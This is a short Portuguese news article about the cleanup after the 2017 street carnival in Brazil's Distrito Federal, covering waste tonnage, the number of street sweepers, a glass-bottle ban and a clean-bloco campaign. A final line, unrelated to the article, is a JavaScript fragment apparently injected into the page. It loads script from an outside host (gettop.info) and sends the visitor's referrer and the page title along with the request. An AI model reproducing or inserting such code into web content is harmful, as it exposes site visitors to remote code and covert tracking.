Nas primeiras horas da manhã deste domingo (26), centenas de garis já estavam espalhados pelo Distrito Federal para recolher o lixo deixado pelos foliões. O Serviço de Limpeza Urbana (SLU) coletou 14 toneladas de resíduos entre sábado (25) e a manhã de hoje. A maior parte se concentrou nos dois maiores eventos: o Babydoll de Nylon, na Praça do Cruzeiro; e o Galinho, na 201 Sul. Os dois reuniram juntos 170 mil pessoas.
O SLU mobilizou 523 garis nos dois dias. Uma medida que facilitou e tornou mais seguro o trabalho deles foi a proibição garrafas de vidro nos blocos. Neste domingo, um efetivo semelhante será empregado na limpeza de blocos como o Raparigueiros, na 110/210 Sul; e o Baratona, na 108/208 Sul.
O carnaval de rua do Distrito Federal em 2017 conta com a campanha Bloco Brasília Limpa, onde servidores do governo — com base em contribuições dos cidadãos, garis e supervisores do SLU — vão eleger os blocos mais limpos.
Os foliões podem ajudar os blocos colaborando com a limpeza durante os eventos e indicando os mais limpos por meio de postagens no Instagram com a hashtag #blocobrasilialimpa, seguida de outra com o nome do bloco.
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;